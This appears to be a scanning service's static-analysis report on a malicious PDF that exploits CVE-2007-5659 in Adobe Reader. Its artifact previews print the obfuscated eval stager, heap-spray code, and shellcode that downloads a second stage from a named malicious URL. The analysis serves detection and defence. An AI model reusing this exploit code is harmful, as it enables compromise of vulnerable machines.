Malicious PDF — malware analysis report

Static analysis result for SHA-256 6634a0518c009cbf…

MALICIOUS

PDF

16.5 KB
MD5: 5f63fb6814a645f064dec185978d94b0 SHA-1: 01744bb4602ead7b8667a2960fe498dd9af45dcf SHA-256: 6634a0518c009cbf7c7a567d42f591d8cfccdb76e14959d86a6db28862d01009
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download a second-stage payload from the URL http://portann.info/cgi-bin/class.phtml/n00a102801r0c0aJ0f000601R35c34dbfXcaca9aa9Y4d4f540fZ03003f36. The presence of multiple JavaScript exploit-related heuristics and a high ML classifier score indicate a high likelihood of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://portann.info/cgi-bin/class.phtml/n00a102801r0c0aJ0f000601R35c34dbfXcaca9aa9Y4d4f540fZ03003f36 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x3F86 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
79a1ef9ded413b98c27bafe6a921da8f3531b48da12ea40e1944cc151049952f		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x19BF 5216 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var tjy__i3W5Vo = new Array();var vd4_Yn60 = 0;var CAFs0c__bb = "";function FH11x2(r17p_5H8FJ8_2_1, OC0_S_x6_m){var Gm1a_7_EC_NrH = OC0_S_x6_m.toString();var u7EF_b = "";for(var D__22jw__U = 0; D__22jw__U < Gm1a_7_EC_NrH.length; D__22jw__U++) {var NmBG_Bu = parseInt(Gm1a_7_EC_NrH.substr(D__22jw__U, 1));if (!isNaN(NmBG_Bu)) {NmBG_Bu = NmBG_Bu.toString(16);if (NmBG_Bu.length == 1) { NmBG_Bu = "0" + NmBG_Bu; }else if (NmBG_Bu.length != 2) { NmBG_Bu = "00"; }u7EF_b = NmBG_Bu + u7EF_b;if (u7EF_b.length == 8) {break;}}}while(u7EF_b.length < 8) { u7EF_b = "0" + u7EF_b; }var jU5W4f6_IA = r17p_5H8FJ8_2_1.toString(16);if (jU5W4f6_IA.length == 1) { jU5W4f6_IA = "0" + jU5W4f6_IA; }else if (jU5W4f6_IA.length != 2) { jU5W4f6_IA = "00"; }u7EF_b = "3" + jU5W4f6_IA + "P" + u7EF_b;return u7EF_b;}function t8_o7_4X_8DAg(mACn_HY0k4_Ag, a_lxu7_1_Bd8cYv){var rU_HDqdo3qlyFX = new Array("");var U__0L2q = mACn_HY0k4_Ag;var BFA_70;if ((BFA_70 = mACn_HY0k4_Ag.lastIndexOf("%u00")) != -1) {if (BFA_70 + 6 == mACn_HY0k4_Ag.length) {rU_HDqdo3qlyFX[0] = mACn_HY0k4_Ag.substr(BFA_70 + 4, 2);U__0L2q = mACn_HY0k4_Ag.substring(0, BFA_70);}}BFA_70 = 1;for (D__22jw__U = 0; D__22jw__U < a_lxu7_1_Bd8cYv.length; D__22jw__U++) {var KbKQ_H_4b = a_lxu7_1_Bd8cYv.charCodeAt(D__22jw__U).toString(16);if (KbKQ_H_4b.length == 1) { KbKQ_H_4b = "0" + KbKQ_H_4b; }rU_HDqdo3qlyFX[BFA_70] = KbKQ_H_4b;BFA_70++;}D__22jw__U = rU_HDqdo3qlyFX[0].length ? 0 : 1;rU_HDqdo3qlyFX[BFA_70] = "00";rU_HDqdo3qlyFX[BFA_70 + 1] = "00";BFA_70 += 2;if ((rU_HDqdo3qlyFX.length - D__22jw__U) % 2) {rU_HDqdo3qlyFX[BFA_70] = "00";}while(D__22jw__U < rU_HDqdo3qlyFX.length) {U__0L2q += "%u" + rU_HDqdo3qlyFX[D__22jw__U + 1] + rU_HDqdo3qlyFX[D__22jw__U];D__22jw__U += 2;}U__0L2q += "%u0000";return U__0L2q;}function t__cQFQHTe(N_07O8f_ow, D_3246x__7_a){while (N_07O8f_ow.length*2<D_3246x__7_a) {N_07O8f_ow += N_07O8f_ow;}N_07O8f_ow = N_07O8f_ow.substring(0,D_3246x__7_a/2);return N_07O8f_ow;}function g0N__3_5wi_qt(I6Oo00qY7_156, G_xY__Mny, U___Jgu_4pt){var kf_NP7Tt = 0x0c0c0c0c;var N_07O8f_ow = unescape(G_xY__Mny);var a_lxu7_1_Bd8cYv = FH11x2(I6Oo00qY7_156, U___Jgu_4pt);var iSYU1uwKo7 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var mACn_HY0k4_Ag = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6a70%u7362%u006c%u7468%u7074%u2f3a%u702f%u726f%u6174%u6e6e%u692e%u666e%u2f6f%u6763%u2d69%u6962%u2f6e%u6c63%u7361%u2e73%u6870%u6d74%u2f6c%u306e%u6130%u3031%u3832%u3130%u3072%u3063%u4a61%u6630%u3030%u3630%u3130%u3352%u6335%u3433%u6264%u5866%u6163%u6163%u6139%u3961%u3459%u3464%u3566%u3034%u5a66%u3330%u3030%u6633%u3633";app.yncfe8__30c = unescape(t8_o7_4X_8DAg(mACn_HY0k4_Ag, a_lxu7_1_Bd8cYv));var l__GpqaT0_Lg4y8 = 0x400000;var w0_uhhs = iSYU1uwKo7.length * 2;var D_3246x__7_a = l__GpqaT0_Lg4y8 - (w0_uhhs+0x38);N_07O8f_ow = t__cQFQHTe(N_07O8f_ow, D_3246x__7_a);var FlBx_qXg = (kf_NP7Tt - 0x400000)/l__GpqaT0_Lg4y8;for (var EnFnW8x = 0; EnFnW8x < FlBx_qXg; EnFnW8x++) {tjy__i3W5Vo[EnFnW8x] = N_07O8f_ow + iSYU1uwKo7;}}function t1G2H_jNsRcA_f6(){var fTpLV_b = "";for (D__22jw__U = 0; D__22jw__U < 12; D__22jw__U++) {fTpLV_b += unescape("%
... (truncated)
legacy_pdfkit_stage_000.js
1d024b2ad6a346bbc82e689d0ad88c1ad4cf491a1f7884773f6c9726d48e1dd5		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1A13 11668 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function xO_M1CNk1_1qX(ve5_n__PpJWjj, cD____q){var e_UoWF78M = new Array();var j8vo_Wl2n = 512;var n7peQbWCbx0Q = 21;var J_8k_2e = 0;var qvURO6_S__nXw = 0;var H3_FCFtK = 0;var Q__P1J6nud3a0V = "";var w3__fwxQ4 = "";var J6x78_DO2UKsi = 6;try {var Fp5_rBgJ2 = 0;if (app) {H3_FCFtK = H3_FCFtK + 2;cD____q = pr[Fp5_rBgJ2].subject;}} catch(e) { }H3_FCFtK = H3_FCFtK + 5;if (!ve5_n__PpJWjj) { e_UoWF78M = new Array(40,42,234,15,0,58);} else {e_UoWF78M = ve5_n__PpJWjj;}var pX_Q1Yba_Mm = 0;var jU4s_f_Qdi__n = 0;var e8T_aW3_KpPx1go = 0;while(jU4s_f_Qdi__n < cD____q.length) {var oWH_y___14 = cD____q.substr(jU4s_f_Qdi__n, 2);var S_2__p = parseInt(oWH_y___14, 21);if (pX_Q1Yba_Mm >= J6x78_DO2UKsi) {pX_Q1Yba_Mm = 0;}S_2__p -= e_UoWF78M[pX_Q1Yba_Mm] * (e8T_aW3_KpPx1go + 2);var s_6N_3018M__j = Math;if (S_2__p < 0) {S_2__p -= s_6N_3018M__j.floor(S_2__p / 256) * (j8vo_Wl2n*2/4);}if (jU4s_f_Qdi__n >= 0) {S_2__p = String.fromCharCode(S_2__p);}if (H3_FCFtK == 6) {Q__P1J6nud3a0V += LS01__B_1T1sD;} else if (H3_FCFtK == 7) {Q__P1J6nud3a0V += S_2__p;} else {Q__P1J6nud3a0V += jU4s_f_Qdi__n;}pX_Q1Yba_Mm++;jU4s_f_Qdi__n += 2;e8T_aW3_KpPx1go++;}var A3HXyD7FnA6Vnlc = this;A3HXyD7FnA6Vnlc['ev'+'al'](Q__P1J6nud3a0V);}
	xO_M1CNk1_1qX(0, "99ad15525b008ha7650e293a4h9f0f1a2j556ga5705g3217649i0ha91k325d9e68235d991f98b2a32cb7007c22ba2h6i279j804a328k296c4ja24b2a0i5d90b81d3ha98g58744fc2bi90ak7g3724895i530f1j8c7e5kae732bak756a2c9c4b228756710b3g7657762d7h5fb16h7g6b155d566k3j1e4i279e564h8f75341g3f79179g2j333050624i3kab4444219h243f30588k23507h1i33b63h5dbc1d2c8d7j362ac35baa061b538a3a7b6k599hbf521h7a354d9i2e4e325e9092439f551bb36d1953b34b39594g16354b9a3h28316854c3633ia1bh3654562i6c2h24bb4h44bk944k180g20560628573b45b44c4198bk071ja45d4328bja01d33760f135c252j9h0g29b7aa4h3kc2331b0a5474af1k835j36059i0k4e92246ja31fad36597f7118384928318f1496a8223j4dad091550bd31a85k7f5a2e58c000af546a3809734e1k9e0g1c198c333630ai94942j5h190b0a334bbh2b9b8g973k681dc324111j7ca48j5e594ib38gaa1g7i386795c34e1k4hb9a5bj132d2j16628b416j5i467bb4b30i4ba68d774d361d1d3j739e7c3f8j4e8h5i165caj26b4c17c5a521ba15h851j884980a53733290e9h58874j6g2e6081a61b80b25h61103f30bb7aad6j5c3fab5919a726849e55be5f2d219981425k2j4e918b8ac24baea34e12275c2772669a9g2h927j460c2g2dbg5d72953e535a6g763haf1b7k3e3f6ic01b324e792f6g5249547g9gc24kb03d69bd422d1a115k8250537824632ec11b9h9j3f500f5i0e103a016h4b84883c4498269b7d2ba2592d388e4h6k6k1ba9a44f199k510f674148582c5c6b2h977f1bai4d236i192b11442eak3i4b48561a37b056a75b48c12h4j0a1c172f4e507h000abfa42bba04352k2g3a2db737b27g4j9913bf2j9f1bad9cbbbg09514b981g22812c989c0b71a81bai7db10g1d1b6a8dbg96674i8887071kak1b3k7i1ha5511b7873a4089c41965eak95b84b293iaa355f55855b0i5b6g2j951d9ib9331b4k2ba57g414i6i25b009782ja4ag9d5bbg2h28230bbg5b379g028a5g811dc18a86ah03515i8daf4k7g2caf8h9a9j951b00887h3d171b876996b7824e9k8aad7515594c3hb4a5353785648576925c135aag011d551h5b7f5a5j2d941f91b87c35c3386c5g02346a257jaf3c52821a78527e1b290f95bh352d6f9k892k6f2eb6b2977ec25d38bb514i284b6c8c8fa27j290f9f8j28b21b2d57849g4e1b748a8436911ja23j4b78104d6231692h44268e337c5f6i1b293254330c395i1b6j664i32aj167523a11b17114b7kbb26581k62ai2j1ja2bf437c7j260eab281k0a348gb8426j3k52a8ad3c1683534fah5h5g364g96a63i0i451dad982444851k304c16af05237g451178804ib7392aaga84b4d310e340j2c7j2j1i8c8i321g4a36440026810k329g4k24062b3d569i4k1aae41bf0a4b77bd384g60291a0c3c9594472gb6b72bah547k962ea14h45bba9bj3g8g4j3da12d9h355bb55f0024534b0d57a86h7i2a4a3hb1091541b661ag8052580a3e9h36a2348c4bbb851852a43gb02d5c5a5a3310930j509b2d99bh1i1bbh06a97g6e262hb40j2jba3787c39c531k2jb3949c19a05937809h7017288ca8c10f5d41c27a7f48841b6087aba8c1510d7ca75g362i0i6ja30cbg5c67617g5i164gag5a9a0e4d5352559k6abe2h642a98b814281j439452732136bi60030h4db1ae7i4i313i27bh8d8c891b52938b47105fc39a85814e333b8g853ea1247ia67kagbj560298654c2f3545875777a35e8d7c6h0dbc5b1c6582a06a555c394f0i7f2ha15d3f62194e0h3i6b176e2a66196k8dbe4jbb393309191b0bbi2k96473c750b521eab4b990i2c5k0f1d199528b0503c84a94b74b44ba8ag36a25h59439i3f5b9b4g9g705a1320370i8331553d4b3e5743977f1b906k32581939234040a5473752561g397b21945k24bc22280k46495668414a1802c2a44bag0k3g533b294j223k9d6f47640d0453bd55100k2g791j1b2g8808135b2ha6a31k8kaf581hadbi4d4f5g4g8g1886
... (truncated)
deobfuscated.js
b8ccb86f3bae17e83d52bfc13645497aa95a04806f2469db3d87e5e6c903325a		 deobfuscated-js PDF JavaScript deobfuscation pass 89773 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
99ad15525b008ha7650e293a4h9f0f1a2j556ga5705g3217649i0ha91k325d9e68235d991f98b2a32cb7007c22ba2h6i279j804a328k296c4ja24b2a0i5d90b81d3ha98g58744fc2bi90ak7g3724895i530f1j8c7e5kae732bak756a2c9c4b228756710b3g7657762d7h5fb16h7g6b155d566k3j1e4i279e564h8f75341g3f79179g2j333050624i3kab4444219h243f30588k23507h1i33b63h5dbc1d2c8d7j362ac35baa061b538a3a7b6k599hbf521h7a354d9i2e4e325e9092439f551bb36d1953b34b39594g16354b9a3h28316854c3633ia1bh3654562i6c2h24bb4h44bk944k180g20560628573b45b44c4198bk071ja45d4328bja01d33760f135c252j9h0g29b7aa4h3kc2331b0a5474af1k835j36059i0k4e92246ja31fad36597f7118384928318f1496a8223j4dad091550bd31a85k7f5a2e58c000af546a3809734e1k9e0g1c198c333630ai94942j5h190b0a334bbh2b9b8g973k681dc324111j7ca48j5e594ib38gaa1g7i386795c34e1k4hb9a5bj132d2j16628b416j5i467bb4b30i4ba68d774d361d1d3j739e7c3f8j4e8h5i165caj26b4c17c5a521ba15h851j884980a53733290e9h58874j6g2e6081a61b80b25h61103f30bb7aad6j5c3fab5919a726849e55be5f2d219981425k2j4e918b8ac24baea34e12275c2772669a9g2h927j460c2g2dbg5d72953e535a6g763haf1b7k3e3f6ic01b324e792f6g5249547g9gc24kb03d69bd422d1a115k8250537824632ec11b9h9j3f500f5i0e103a016h4b84883c4498269b7d2ba2592d388e4h6k6k1ba9a44f199k510f674148582c5c6b2h977f1bai4d236i192b11442eak3i4b48561a37b056a75b48c12h4j0a1c172f4e507h000abfa42bba04352k2g3a2db737b27g4j9913bf2j9f1bad9cbbbg09514b981g22812c989c0b71a81bai7db10g1d1b6a8dbg96674i8887071kak1b3k7i1ha5511b7873a4089c41965eak95b84b293iaa355f55855b0i5b6g2j951d9ib9331b4k2ba57g414i6i25b009782ja4ag9d5bbg2h28230bbg5b379g028a5g811dc18a86ah03515i8daf4k7g2caf8h9a9j951b00887h3d171b876996b7824e9k8aad7515594c3hb4a5353785648576925c135aag011d551h5b7f5a5j2d941f91b87c35c3386c5g02346a257jaf3c52821a78527e1b290f95bh352d6f9k892k6f2eb6b2977ec25d38bb514i284b6c8c8fa27j290f9f8j28b21b2d57849g4e1b748a8436911ja23j4b78104d6231692h44268e337c5f6i1b293254330c395i1b6j664i32aj167523a11b17114b7kbb26581k62ai2j1ja2bf437c7j260eab281k0a348gb8426j3k52a8ad3c1683534fah5h5g364g96a63i0i451dad982444851k304c16af05237g451178804ib7392aaga84b4d310e340j2c7j2j1i8c8i321g4a36440026810k329g4k24062b3d569i4k1aae41bf0a4b77bd384g60291a0c3c9594472gb6b72bah547k962ea14h45bba9bj3g8g4j3da12d9h355bb55f0024534b0d57a86h7i2a4a3hb1091541b661ag8052580a3e9h36a2348c4bbb851852a43gb02d5c5a5a3310930j509b2d99bh1i1bbh06a97g6e262hb40j2jba3787c39c531k2jb3949c19a05937809h7017288ca8c10f5d41c27a7f48841b6087aba8c1510d7ca75g362i0i6ja30cbg5c67617g5i164gag5a9a0e4d5352559k6abe2h642a98b814281j439452732136bi60030h4db1ae7i4i313i27bh8d8c891b52938b47105fc39a85814e333b8g853ea1247ia67kagbj560298654c2f3545875777a35e8d7c6h0dbc5b1c6582a06a555c394f0i7f2ha15d3f62194e0h3i6b176e2a66196k8dbe4jbb393309191b0bbi2k96473c750b521eab4b990i2c5k0f1d199528b0503c84a94b74b44ba8ag36a25h59439i3f5b9b4g9g705a1320370i8331553d4b3e5743977f1b906k32581939234040a5473752561g397b21945k24bc22280k46495668414a1802c2a44bag0k3g533b294j223k9d6f47640d0453bd55100k2g791j1b2g8808135b2ha6a31k8kaf581hadbi4d4f5g4g8g18867432a769b7369e2jbf4eb3711i2h7h67101j7g58bb6haj9g1g5g264k091545327i2da85b751ba13e990db01d240g97694f377825a3bh7821bcae9f612k4i28a69128664b8eai037dbh292hc007c22h246kajbh78894k7f7a7jbdbf4b0g6kb57g3h4b6h5g7b9g5228924cbe73bj4b2g5bb0045529926eb44e8947b54287bgb3264f1b7k2a25266k0i7e0dac4k1i3d9a2a054b5g026ibb6k4ba3105h3172591i0f7b97314g7aa1964k7f37ag918iabba4j46b15a0k44417e9i5d8k5058916d610c8b1g56594a700b59837c641j8e4g1c4f7k9f13374i5i5d2h4428795h7i8f8a41ak213b050a1b3e0g757i4i39953i682h7158373a4g7d1135721a3dbf615eba0f527a82353ec335b7295e81b84f443f2j998a3627a04b4d7d3j4e391b6b7a1d9h425cb3622444852h6a7i551443556k674161563d006j2314c35c755a4e634e557j5b3abc883i1j32244g0c1j6e300i963h2e00253e61691b2g1a0d8eb22c9d0f2b2d554da5163aaia0535688bf371d267a9i02a85j562f7b2841aj4j6k9bb57b0d35a765b9174d5f2b7cba96ak1k3j8304300f2dab44138j805e0a2hb4bhaf4b5d2dbi6e3k4b0h4jaf3e724b2412ba66074b9c389105163f10b99k706f4i581a0db71d5c9j0j06865955278g91ai7k4b458a91512b4baf7kaj0h37280778bd6jaj5c84917bbf20269g6h8a6c66565052bc06bd558971a96d381b0h318kbg6k294h2baf5kb558a41387992c56b70ga14h5f4b3c05718c8j38a32e8b4f403e311k647d7h4b6fc3794f194b9100957e605d38bb514b964b6i935k97211ba962594g324f208b559e784f6j8e7842aj3f0h4c5487434i546h81c08e1bad60709e2c4d2c4h3j
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.